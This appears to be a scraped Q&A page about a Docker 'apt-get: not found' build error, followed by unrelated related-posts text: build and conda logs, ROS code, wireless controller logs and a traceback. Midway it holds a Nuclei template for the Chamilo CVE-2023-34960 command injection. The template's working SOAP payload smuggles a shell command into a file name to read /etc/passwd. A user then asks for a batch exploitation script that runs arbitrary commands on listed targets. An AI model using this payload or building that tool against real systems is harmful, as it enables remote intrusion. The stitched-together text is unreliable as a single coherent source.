Sending build context to Docker daemon 108.1MB Step 1/5 : FROM django_project_tos_services_local:latest ---> 71fc97bcebc6 Step 2/5 : RUN apt-get update && apt-get install -y apt-utils && apt-get install -y apt-get ---> Running in 8e1803471035 /bin/sh: apt-get: not found The command '/bin/sh -c apt-get update && apt-get install -y apt-utils && apt-get install -y apt-get' returned a non-zero code: 127

Posted: 2024-01-07 16:07:49
The error message `/bin/sh: apt-get: not found` means the base image simply does not contain the `apt-get` binary. Note that the original suggestion of running `apt-get install -y apt-get` is circular and cannot work: if `apt-get` is missing, it cannot be used to install itself. The base image `django_project_tos_services_local:latest` is most likely not Debian-based (for example, Alpine images use `apk` instead). If it is Alpine-based, use its native package manager: ``` RUN apk update && apk add --no-cache <packages> ``` Alternatively, switch to a base image that already ships `apt-get`, such as `ubuntu`: ``` FROM ubuntu:latest RUN apt-get update && \ apt-get install -y apt-utils ``` Hope this helps you solve the problem.
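To find out which package manager a base image actually ships before writing `RUN` steps against it, you can probe for the common ones from a shell. This is a diagnostic sketch; the image name comes from the build log above, and on your machine you would run the loop inside the container (e.g. via `docker run --rm django_project_tos_services_local:latest sh -c '...'`):

```shell
# Print every common package manager found on PATH.
for pm in apt-get apk yum dnf microdnf; do
  if command -v "$pm" >/dev/null 2>&1; then
    echo "available: $pm"
  fi
done
```

Whichever name it prints tells you which install command (`apt-get install`, `apk add`, `yum install`, ...) your Dockerfile should use.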
Related questions

Sending build context to Docker daemon 108.1MB Step 1/4 : FROM django_project_tos_services_local:latest ---> 71fc97bcebc6 Step 2/4 : RUN apt-get update ---> Running in 3706e59f53c6 /bin/sh: apt-get: not found The command '/bin/sh -c apt-get update' returned a non-zero code: 127

This error occurs at Step 2 of the Dockerfile, when running "apt-get update". The message `/bin/sh: apt-get: not found` means the base image `django_project_tos_services_local:latest` does not contain `apt-get` at all — and you cannot bootstrap `apt-get` with `apt-get` itself. Check what that image is built from: if it is Alpine-based, use its native package manager instead: ``` RUN apk update && apk add --no-cache <packages> ``` Otherwise, rebuild on a Debian/Ubuntu base image that ships `apt-get`. Hope this helps you solve the problem.

After adding it, my Dockerfile is:

```
FROM python:2.7.17
RUN apt-get update
RUN apt-get install -y apt-utils
RUN apt-get install -y apt-get
```

but it still fails: Sending build context to Docker daemon 108.1MB Step 1/9 : FROM python:2.7.17 ---> 01c23fcbab3f Step 2/9 : FROM django_project_tos_services_local:latest ---> 71fc97bcebc6 Step 3/9 : RUN apt-get update ---> Running in 5ef45f1e3f2c /bin/sh: apt-get: not found The command '/bin/sh -c apt-get update' returned a non-zero code: 127

The build log holds the clue: there are now two `FROM` lines (Step 1/9: `FROM python:2.7.17`, then Step 2/9: `FROM django_project_tos_services_local:latest`). Each `FROM` starts a new build stage, so every `RUN` after the second `FROM` executes on `django_project_tos_services_local:latest` again — the `python:2.7.17` stage (which does have `apt-get`) is simply discarded. Also, `apt-get install -y apt-get` is circular and should be dropped: if `apt-get` exists it is pointless, and if it does not exist it cannot run. Keep a single `FROM` whose base actually ships `apt-get`, for example: ``` FROM python:2.7.17 RUN apt-get update && \ apt-get install -y --no-install-recommends apt-utils ``` The `--no-install-recommends` flag avoids pulling in recommended-but-optional dependencies. If you must build on `django_project_tos_services_local:latest` and it is Alpine-based, use `apk add` instead of `apt-get`.

Related posts

```
# Use the Ubuntu base image
FROM docker.1ms.run/ubuntu:22.04

# Non-interactive mode to avoid prompts during package installation
ENV DEBIAN_FRONTEND=noninteractive

# Switch the apt sources to the Aliyun mirror to speed up builds
RUN sed -i 's|http://archive.ubuntu.com/ubuntu/|http://mirrors.aliyun.com/ubuntu/|g' /etc/apt/sources.list \
    && sed -i 's|http://security.ubuntu.com/ubuntu|http://mirrors.aliyun.com/ubuntu|g' /etc/apt/sources.list \
    && rm -rf /var/lib/apt/lists/* \
    && apt-get clean \
    && apt-get update -y --fix-missing

# Update the package index and install required tools
RUN apt-get update && apt-get install -y \
    curl \
    git \
    build-essential \
    sshpass \
    libxcomposite1 \
    libxrandr2 \
    libxtst6 \
    libsm6 \
    libxdamage1 \
    libxfixes3 \
    && rm -rf /var/lib/apt/lists/*

# Install Node.js and npm
RUN curl -fsSL https://deb.nodesource.com/setup_18.x | bash - \
    && apt-get install -y nodejs \
    && npm install -g npm@10

# Install the Docker CLI so this container can be controlled from outside via another container
RUN apt-get update && apt-get install -y docker.io

# Install Vue CLI
RUN npm install -g @vue/cli --registry=https://registry.npmmirror.com

# Create the working directory
WORKDIR /root

# Expose the default dev-server port
EXPOSE 8080

# Default command when the container starts
CMD [ "bash" ]
```

Result after running:

shc123@ubuntu:~/Documents/rb_config$ sudo docker build -t vue-ubuntu-env .
Sending build context to Docker daemon 248MB Step 1/10 : FROM docker.1ms.run/ubuntu:22.04 ---> a24be041d957 Step 2/10 : ENV DEBIAN_FRONTEND=noninteractive ---> Using cache ---> 0a78f4d6fc75 Step 3/10 : RUN sed -i 's|http://archive.ubuntu.com/ubuntu/|http://mirrors.aliyun.com/ubuntu/|g' /etc/apt/sources.list && sed -i 's|http://security.ubuntu.com/ubuntu|http://mirrors.aliyun.com/ubuntu|g' /etc/apt/sources.list && rm -rf /var/lib/apt/lists/* && apt-get clean && apt-get update -y --fix-missing ---> Running in 746c4cf4af05 Get:1 http://mirrors.aliyun.com/ubuntu jammy InRelease [270 kB] Get:2 http://mirrors.aliyun.com/ubuntu jammy-updates InRelease [128 kB] Get:3 http://mirrors.aliyun.com/ubuntu jammy-backports InRelease [127 kB] Get:4 http://mirrors.aliyun.com/ubuntu jammy-security InRelease
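The `sed` mirror rewrite in the Dockerfile above can be sanity-checked outside Docker before baking it into an image. This is a sketch using a throwaway file; the URLs and the substitution pattern are taken verbatim from the Dockerfile:

```shell
# Write a sample Ubuntu 22.04 sources.list entry, then apply the same rewrite.
printf 'deb http://archive.ubuntu.com/ubuntu/ jammy main restricted\n' > /tmp/sources.list.test
sed -i 's|http://archive.ubuntu.com/ubuntu/|http://mirrors.aliyun.com/ubuntu/|g' /tmp/sources.list.test
cat /tmp/sources.list.test
```

If the printed line points at `mirrors.aliyun.com`, the expression is doing what the comment claims, and the build log above (fetching `InRelease` from `mirrors.aliyun.com`) confirms the mirror switch took effect in the image too.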

$ /home/qlunlp/software/anaconda3531/bin/conda install pandas

environment variables:
    CIO_TEST=<not set>
    CONDA_DEFAULT_ENV=mr
    CONDA_EXE=/home/qlunlp/software/anaconda3531/bin/conda
    CONDA_PREFIX=/home/qlunlp/software/anaconda3531/envs/mr
    CONDA_PREFIX_1=/home/qlunlp/software/anaconda3531
    CONDA_PROMPT_MODIFIER=(mr)
    CONDA_PYTHON_EXE=/home/qlunlp/software/anaconda3531/bin/python
    CONDA_ROOT=/home/qlunlp/software/anaconda3531
    CONDA_SHLVL=2
    LD_LIBRARY_PATH=/home/qlunlp/software/anaconda3531/envs/paddle_env/lib/:/home/qlunlp/software/anaconda3531/envs/paddle_env/lib/:
    PATH=/home/qlunlp/software/anaconda3531/envs/mr/bin:/home/qlunlp/software/anaconda3531/bin:/home/qlunlp/.vscode-server/cli/servers/Stable-2fc07b811f760549dab9be9d2bedd06c51dfcb9a/server/bin/remote-cli:/home/qlunlp/software/anaconda3531/bin:/home/qlunlp/software/anaconda3531/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/usr/local/cuda-12.3/bin:/home/qlunlp/.vscode-server/data/User/globalStorage/github.copilot-chat/debugCommand:/usr/local/cuda-12.3/bin
    REQUESTS_CA_BUNDLE=<not set>
    SSL_CERT_FILE=/usr/lib/ssl/certs/ca-certificates.crt

     active environment : mr
    active env location : /home/qlunlp/software/anaconda3531/envs/mr
            shell level : 2
       user config file : /home/qlunlp/.condarc
 populated config files : /home/qlunlp/.condarc
          conda version : 4.5.11
    conda-build version : 3.15.1
         python version : 3.7.0.final.0
       base environment : /home/qlunlp/software/anaconda3531  (writable)
           channel URLs : https://anaconda.org/linux-64
                          https://anaconda.org/noarch
                          https://repo.anaconda.com/pkgs/main/linux-64
                          https://repo.anaconda.com/pkgs/main/noarch
                          https://repo.anaconda.com/pkgs/free/linux-64
                          https://repo.anaconda.com/pkgs/free/noarch
                          https://repo.anaconda.com/pkgs/r/linux-64
                          https://repo.anaconda.com/pkgs/r/noarch
                          https://repo.anaconda.com/pkgs/pro/linux-64
                          https://repo.anaconda.com/pkgs/pro/noarch
          package cache : /home/qlunlp/software/anaconda3531/pkgs
                          /home/qlunlp/.conda/pkgs
       envs directories : /home/qlunlp/software/anaconda3531/envs
                          /home/qlunlp/.conda/envs
               platform : linux-64
             user-agent : conda/4.5.11 requests/2.31.0 CPython/3.7.0 Linux/5.15.0-122-generic ubuntu/20.04 glibc/2.31
                UID:GID : 1000:1000
             netrc file : None
           offline mode : False

An unexpected error has occurred. Conda has prepared the above report. If submitted, this report will be used by core maintainers to improve future releases of conda. Would you like conda to send this report to the core maintainers? [y/N]: y Upload did not complete. Thank you for helping to improve conda. Opt-in to always sending reports (and not see this message again) by running

$ conda config --set report_errors true
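Two things stand out in this report: the channel list contains `https://anaconda.org/linux-64` and `https://anaconda.org/noarch`, which are not valid conda channel URLs, and conda 4.5.11 is very old. A first step would be to reduce `~/.condarc` to something minimal and then run `conda update conda` from the base environment. This is only a sketch — adjust the channels to whatever you actually rely on:

```
# ~/.condarc — minimal sketch; the suspect anaconda.org entries are removed
channels:
  - defaults
show_channel_urls: true
# Suppress the "send this report?" prompt seen above
report_errors: false
```

The `report_errors` key is the same one the error message itself mentions (`conda config --set report_errors true` enables uploads; `false` disables the prompt).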

[root@cc dockfile]# docker build -t zhangsan . Sending build context to Docker daemon 2.048 kB Step 1/4 : FROM centos:7 ---> eeb6ee3f44bd Step 2/4 : MAINTAINER Macao<[email protected]> ---> Running in 6d911292fdda ---> d61e3702af41 Removing intermediate container 6d911292fdda Step 3/4 : RUN yum -y install vim net-tools ---> Running in 95bb5a65df0f Loaded plugins: fastestmirror, ovl Determining fastest mirrors Could not retrieve mirrorlist http://mirrorlist.centos.org/?release=7&arch=x86_64&repo=os&infra=container error was 14: curl#6 - "Could not resolve host: mirrorlist.centos.org; Unknown error" One of the configured repositories failed (Unknown), and yum doesn't have enough cached data to continue. At this point the only safe thing yum can do is fail. There are a few ways to work "fix" this: 1. Contact the upstream for the repository and get them to fix the problem. 2. Reconfigure the baseurl/etc. for the repository, to point to a working upstream. This is most often useful if you are using a newer distribution release than is supported by the repository (and the packages for the previous distribution release still work). 3. Run the command with the repository temporarily disabled yum --disablerepo=<repoid> ... 4. Disable the repository permanently, so yum won't use it by default. Yum will then just ignore the repository until you permanently enable it again or use --enablerepo for temporary usage: yum-config-manager --disable <repoid> or subscription-manager repos --disable=<repoid> 5. Configure the failing repository to be skipped, if it is unavailable. Note that yum will try to contact the repo. when it runs most commands, so will have to try and fail each time (and thus. yum will be be much slower). If it is a very temporary problem though, this is often a nice compromise: yum-config-manag
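The root cause here is that `mirrorlist.centos.org` was retired when CentOS 7 reached end of life, so `yum` inside a fresh `centos:7` container can no longer resolve it. A common workaround is to point the repo files at `vault.centos.org` instead. Below is a sketch of the usual `sed` rewrite, demonstrated on a sample repo file (in the real image the target is `/etc/yum.repos.d/CentOS-*.repo`, and you should verify the vault paths for your minor release):

```shell
# Build a sample repo file mimicking the stock centos:7 CentOS-Base.repo.
mkdir -p /tmp/repotest
cat > /tmp/repotest/CentOS-Base.repo <<'EOF'
[base]
mirrorlist=http://mirrorlist.centos.org/?release=7&arch=x86_64&repo=os
#baseurl=http://mirror.centos.org/centos/7/os/x86_64/
EOF

# Comment out the dead mirrorlist and enable the vault baseurl instead.
sed -i -e 's|^mirrorlist=|#mirrorlist=|g' \
       -e 's|^#baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' \
       /tmp/repotest/CentOS-Base.repo
cat /tmp/repotest/CentOS-Base.repo
```

In a Dockerfile you would run the same `sed` against `/etc/yum.repos.d/CentOS-*.repo` in a `RUN` step before the first `yum install`.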

```
bool MoveObject::goObject()
{
    // Connect to the move_base action server; retry with a 5 s timeout
    while (!move_base.waitForServer(ros::Duration(5.0)))
    {
        ROS_INFO("Waiting for move_base action server...");
    }
    ROS_INFO("Connected to move base server");

    // Set the target pose
    move_base_msgs::MoveBaseGoal goal;
    goal.target_pose.header.frame_id = "map";
    goal.target_pose.header.stamp = ros::Time::now();
    // goal.target_pose.pose.position.x = Obj_pose.pose.position.x;
    // goal.target_pose.pose.position.y = Obj_pose.pose.position.y;
    // target_odom_point.pose.pose.position.x = goal.target_pose.pose.position.x;
    // target_odom_point.pose.pose.position.y = goal.target_pose.pose.position.y;
    target_odom_point.pose.pose.position.x = Obj_pose.pose.position.x;
    target_odom_point.pose.pose.position.y = Obj_pose.pose.position.y;
    cout << goal.target_pose.pose.position.x << endl;
    cout << goal.target_pose.pose.position.y << endl;

    //goal.target_pose.pose.orientation = tf::createQuaternionMsgFromYaw(g.response.yaw);
    goal.target_pose.pose.orientation.z = 0.0;
    goal.target_pose.pose.orientation.w = 1.0;

    tf::quaternionMsgToTF(target_odom_point.pose.orientation, quat);
    tf::Matrix3x3(quat).getRPY(roll, pitch, yaw);  // convert quaternion to roll/pitch/yaw
    yaw += 1.5708;                                 // rotate by 90 degrees
    target_odom_point.pose.position.x -= keep_distance * cos(yaw);
    target_odom_point.pose.position.y -= keep_distance * sin(yaw);
    goal.target_pose.pose.position.x = target_odom_point.pose.pose.position.x;  // ';' was missing in the original
    goal.target_pose.pose.position.y = target_odom_point.pose.pose.position.y;  // ';' was missing in the original
    target_odom_point.pose.orientation = tf::createQuaternionMsgFromYaw(yaw);

    ROS_INFO("Sending goal");
    move_base.sendGoal(goal);
    move_base.waitForResult();

    if (move_base.getState() == actionlib::SimpleClientGoalState::SUCCEEDED)
    {
        ROS_INFO("Goal succeeded!");
        return true;
    }
    else
    {
        ROS_INFO("Goal failed");
        return false;
    }
}
```
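The yaw/offset arithmetic in `goObject()` — rotate the object's yaw by 90° (the `1.5708` constant) and back the goal off by `keep_distance` along that rotated heading — can be checked in isolation. A small sketch, not ROS code; the function name and argument names are made up for illustration:

```python
import math

def standoff_goal(obj_x, obj_y, obj_yaw, keep_distance):
    """Mirror the pose math in goObject(): rotate yaw by +90 degrees,
    then step back keep_distance along the rotated heading."""
    yaw = obj_yaw + math.pi / 2  # the 1.5708 offset in the C++ code
    goal_x = obj_x - keep_distance * math.cos(yaw)
    goal_y = obj_y - keep_distance * math.sin(yaw)
    return goal_x, goal_y, yaw

# Object at the origin facing +x: the goal lands keep_distance to its right (-y side).
print(standoff_goal(0.0, 0.0, 0.0, 0.5))
```

Checking a couple of such cases by hand makes it easy to confirm whether the 90° rotation and the sign of the `-= keep_distance * ...` terms put the robot on the side of the object you intend.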

id: CVE-2023-34960 info: name: Chamilo Command Injection author: DhiyaneshDK severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py - http://chamilo.com - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.93314 epss-percentile: 0.99067 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo shodan-query: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve,cve2023,packetstorm,chamilo http: - raw: - | POST /main/webservices/additional_webservices.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">{}.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

      - type: word
        part: header
        words:
          - text/xml

      - type: status
        status:
          - 200
# digest: 4a0a00473045022034e60ad33e2160ec78cbef2c6c410b14dabd6c3ca8518c21571e310453a24e25022100927e4973b55f38f2cc8ceca640925b7066d4325032b04fb0eca080984080a1d0:922c64590222798bb761d5b6d8e72950

Based on the PoC above, please implement the exploit in Python, reading targets from a file in the current directory for batch execution — e.g. -f 777.txt; -c "command to execute" should be a dynamic variable; and -o 7.txt, where 7.txt is a user-chosen output filename, e.g. python CVE-2023-34960exp.py -f 777.txt -c "id" -o 89.txt. Show the detailed success and failure progress and store the successfully exploited targets in the output file the user selects (-o saves the successful results). Output system: colored terminal output (green for success / red for failure), live snippets of command execution results, automatic saving of successful targets to the specified file, and a detailed summary report. Smart URL handling: auto-complete the protocol scheme (http/https) and auto-build the full API endpoint path. During testing, display the request and response packets to give a detailed exploitation trace.

=> [internal] load build definition from Dockerfile-with-features 0.0s => => transferring dockerfile: 1.84kB 0.0s => [internal] load metadata for asia.gcr.io/google.com/cloudsdktool/goog 0.2s => [internal] load metadata for mcr.microsoft.com/devcontainers/base:alp 0.0s [2025-03-18T02:00:33.451Z] [+] Building 0.3s (3/3) docker:orbstack => [internal] load build definition from Dockerfile-with-features 0.0s => => transferring dockerfile: 1.84kB 0.0s => [internal] load metadata for asia.gcr.io/google.com/cloudsdktool/goog 0.3s => [internal] load metadata for mcr.microsoft.com/devcontainers/base:alp 0.0s [2025-03-18T02:00:33.653Z] [+] Building 0.5s (7/13) docker:orbstack => [internal] load build definition from Dockerfile-with-features 0.0s => => transferring dockerfile: 1.84kB 0.0s => [internal] load metadata for asia.gcr.io/google.com/cloudsdktool/goog 0.3s => [internal] load metadata for mcr.microsoft.com/devcontainers/base:alp 0.0s => [internal] load .dockerignore 0.0s => => transferring context: 2B 0.0s => CACHED [dev_container_auto_added_stage_label 1/7] FROM mcr.microsoft. 0.0s => CACHED [gcloud 1/1] FROM asia.gcr.io/google.com/cloudsdktool/google-c 0.0s => [internal] load build context 0.0s [2025-03-18T02:00:33.653Z] => => transferring context: 99B 0.0s => [dev_container_auto_added_stage_label 2/7] RUN apk add --no-cache c 0.2s => => # fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/aarch64/APKINDE => => # X.tar.gz [2025-03-18T02:00:33.804Z] [+] Building 0.7s (7/13)

Please walk through these log lines one by one:

XOS#2025/05/28 16:44:15 informational: WMAC_AC: Dis-assocation frame received from station with MAC address 92:aa:0e:84:c5:22 and reason code 3
2025/05/28 16:44:15 informational: WMAC_AC: Sending DEL-STA to AP 1 by CAPWAP with station MAC address 92:aa:0e:84:c5:22 BSSID 6c:ef:c6:65:ab:d1
2025/05/28 16:44:15 notifications: WMAC_AC: [IPC] Sending DELETE-STA to AP by CAPWAP with station MAC 92:aa:0e:84:c5:22. asso seq [0x1000]
2025/05/28 16:44:15 errors : WMAC_AC: Failed to notify L2F to delete sta with MAC address 92:aa:0e:84:c5:22 | vlan 1 | dynamic vlan -1.
2025/05/28 16:44:15 informational: WMAC_AC: STA 92:aa:0e:84:c5:22 - event 2 notification
2025/05/28 16:44:15 informational: WMAC_AC: Unauthorizing port for station 92:aa:0e:84:c5:22.
2025/05/28 16:44:15 informational: WMAC_AC: STA 92:aa:0e:84:c5:22 - MLME-DISASSOCIATE.indication(92:aa:0e:84:c5:22, 3)
2025/05/28 16:44:15 informational: WMAC_AC: Receiving authention frame from station 92:07:d3:da:91:62.
2025/05/28 16:44:15 informational: WMAC_AC: Receiving authention frame from station 92:07:d3:da:91:62 in bssid 6c:ef:c6:65:ab:d7. auth_alg 0, auth_transaction 1
2025/05/28 16:44:15 informational: WMAC_AC: Authentication OK (Open-System) with bssid 6c:ef:c6:65:ab:d7 .
2025/05/28 16:44:15 informational: WMAC_AC: Receiving association request from sta 92:07:d3:da:91:62 in bssid 6c:ef:c6:65:ab:d7
2025/05/28 16:44:15 warnings : WMAC_AC: IEEE 802.11 element parse ignored unknown element (id=191 elen=12)
2025/05/28 16:44:15 informational: WMAC_AC: Station association succeed with AID: 1, SSID: a-wangjian-portal, BSSID: 6c:ef:c6:65:ab:d7.
2025/05/28 16:44:15 informational: WMAC_AC: Vlan 1 station increasing, count 3.
2025/05/28 16:44:15 notifications: WMAC_AC: [IPC] Sending ADD-STATION to AP by CAPWAP with station MAC 92:07:d3:da:91:62, AID 1 and APID 1 RID 2.
assoseq [0x1000] 2025/05/28 16:44:15 informational: APM: APM_Cloud_Server_Sendto(line:3313):send sta online 2025/05/28 16:44:15 informational: APM: APM_Cloud_Server_Sendto(line:3319):sta mac:92:07:d3:da:91:62 2025/05/28 16:44:15 informational: APM: APM_Cloud_Server_Sendto(line:3324):AP mac:6c:ef:c6:65:ab:c0 2025/05/28 16:44:15 errors : APM: APM_WmacSocket_Recv_Msg(line:975):!!! RECV MSG WMAC_GET_TRAFFIC_LIMIT, StaMac[92:07:d3:da:91:62] 2025/05/28 16:44:15 errors : APM: APM_SendStaTraffic(line:794):APM_SendStaTraffic uplimit 0, downlimit 0 2025/05/28 16:44:15 debugging : APM: APM_WMAC_SendStaTrafficLimit(line:1059):APM_WMAC_SendStaTrafficLimit success 2025/05/28 16:44:15 informational: APM: APM_DecMsgHead(line:71):MessageType 8 MessageLen 50 2025/05/28 16:44:15 informational: APM: APM_Recv_Pkt_Handle(line:3467):Recv MsgType: STA_AUTH_SUCCESS 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2970):store id :1 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2829):Sta mac:92:07:d3:da:91:62 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2708):AP mac:6c:ef:c6:65:ab:c0 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:3061):usProfileId 2 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2855):STA pass time:586 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:3206):APM Portal username:admin 2025/05/28 16:44:15 informational: APM: APM_RecvPktProcess(line:2509):[EasyPortal] user $MAC:92:7:d3:da:91:62 auth success, pass time is 600 s 2025/05/28 16:44:15 informational: APM: APM_AddUserNode(line:836):APM_AddUserNode:: User Node is exist (mac = 9207.d3da.9162) 2025/05/28 16:44:15 informational: APM: APM_AddUserNode(line:851):Create user Node timer 2025/05/28 16:44:15 errors : APM: APM_SendStaTraffic(line:794):APM_SendStaTraffic uplimit 0, downlimit 0 2025/05/28 16:44:15 debugging : APM: APM_WMAC_SendStaTrafficLimit(line:1059):APM_WMAC_SendStaTrafficLimit success 2025/05/28 16:44:15 informational: APM: 
APM_DecMsgHead(line:71):MessageType 25 MessageLen 54 2025/05/28 16:44:15 informational: APM: APM_Recv_Pkt_Handle(line:3467):Recv MsgType: User trafic limit 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2970):store id :1 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2829):Sta mac:92:07:d3:da:91:62 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2732):AP input limit:0 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2738):AP output limit:0 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2708):AP mac:6c:ef:c6:65:ab:c0 2025/05/28 16:44:15 debugging : APM: APM_SetStaTraffic(line:2399):STA[92:07:d3:da:91:62] inputlimit 0 outlimit 0 2025/05/28 16:44:15 informational: APM: APM_DecMsgHead(line:71):MessageType 7 MessageLen 53 2025/05/28 16:44:15 informational: APM: APM_Recv_Pkt_Handle(line:3467):Recv MsgType: STA_ONLINE_RESP 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2970):store id :1 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2829):Sta mac:92:07:d3:da:91:62 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2708):AP mac:6c:ef:c6:65:ab:c0 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2843):STA Privilege:0 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:3061):usProfileId 2 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2849):STA Auth Mode:1 2025/05/28 16:44:15 informational: APM: APM_DecPkt_Data(line:2855):STA pass time:600 2025/05/28 16:44:15 informational: APM: APM_RecvPktProcess(line:2500):sta online response 2025/05/28 16:44:15 informational: APM: APM_UpdateUserNode(line:702):APM_AddUserNode:: User Node is exist (mac = 9207.d3da.9162) 2025/05/28 16:44:15 informational: APM: APM_UpdateUserNode(line:752):APM_AddUserNode:: Create user Node timer 2025/05/28 16:44:16 informational: WMAC_AC: STA 92:aa:0e:84:c5:22 - deauthenticated due to inactivity 2025/05/28 16:44:16 informational: WMAC_AC: STA 92:aa:0e:84:c5:22 - 
MLME-DEAUTHENTICATE.indication(92:aa:0e:84:c5:22, 2) 2025/05/28 16:44:16 informational: WMAC_AC: Trying to free station with MAC address 92:aa:0e:84:c5:22 and BSSID 6c:ef:c6:65:ab:d1. 2025/05/28 16:44:16 informational: WMAC_AC: Vlan 1 station degression, count 2. 2025/05/28 16:44:16 informational: WMAC_AC: Sending DEL-STA to AP 1 by CAPWAP with station MAC address 92:aa:0e:84:c5:22 BSSID 6c:ef:c6:65:ab:d1 2025/05/28 16:44:16 notifications: WMAC_AC: [IPC] Sending DELETE-STA to AP by CAPWAP with station MAC 92:aa:0e:84:c5:22. asso seq [0x1000] 2025/05/28 16:44:16 errors : WMAC_AC: Failed to notify L2F to delete sta with MAC address 92:aa:0e:84:c5:22 | vlan 1 | dynamic vlan -1.

/home/wiseatc/.local/lib/python3.11/site-packages/jieba/_compat.py:18: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources W0703 16:13:22.516433 3913223 torch/distributed/run.py:766] W0703 16:13:22.516433 3913223 torch/distributed/run.py:766] ***************************************** W0703 16:13:22.516433 3913223 torch/distributed/run.py:766] Setting OMP_NUM_THREADS environment variable for each process to be 1 in default, to avoid your system being overloaded, please further tune the variable for optimal performance in your application as needed. W0703 16:13:22.516433 3913223 torch/distributed/run.py:766] ***************************************** /home/wiseatc/.local/lib/python3.11/site-packages/jieba/_compat.py:18: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources /home/wiseatc/.local/lib/python3.11/site-packages/jieba/_compat.py:18: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources /home/wiseatc/.local/lib/python3.11/site-packages/jieba/_compat.py:18: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. 
import pkg_resources /home/wiseatc/.local/lib/python3.11/site-packages/jieba/_compat.py:18: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources [rank0]: Traceback (most recent call last): [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/utils/import_utils.py", line 1863, in _get_module [rank0]: return importlib.import_module("." + module_name, self.__name__) [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "/usr/lib/python3.11/importlib/__init__.py", line 126, in import_module [rank0]: return _bootstrap._gcd_import(name[level:], package, level) [rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [rank0]: File "<frozen importlib._bootstrap>", line 1206, in _gcd_import [rank0]: File "<frozen importlib._bootstrap>", line 1178, in _find_and_load [rank0]: File "<frozen importlib._bootstrap>", line 1149, in _find_and_load_unlocked [rank0]: File "<frozen importlib._bootstrap>", line 690, in _load_unlocked [rank0]: File "<frozen importlib._bootstrap_external>", line 940, in exec_module [rank0]: File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed [rank0]: File "/usr/local/lib/python3.11/dist-packages/transformers/models/llama/tokenization_llama_fast.py", line 29, in <module> [rank0]: from .tokenization_llama import 